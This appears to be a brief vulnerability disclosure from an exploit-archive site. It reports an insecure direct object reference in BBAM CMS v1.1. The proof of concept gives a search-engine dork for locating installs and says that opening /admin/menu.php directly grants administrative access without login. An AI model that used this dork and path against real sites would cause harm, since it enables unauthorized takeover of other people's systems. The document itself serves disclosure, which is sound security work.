Authored by indoushka

BBAM version 1.1 suffers from an insecure direct object reference vulnerability that allows for administrative access.

====================================================================================================================================
| # Title : bbam CMS v1.1 unauthorized administrative access Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |
| # Vendor : https://www.facebook.com/Mohammed.web.developer |
| # Dork : مُشغل بواسطة BBAM v1.1 برمجة محمد الطرهوني |
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine .

[+] bbam CMS v1.1allows for unauthorized administrative access.:

[+] Use Payload : /admin/menu.php

[+] http://localhost/bbam/admin/menu.php


Greetings to :=====================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
===================================================================================================================================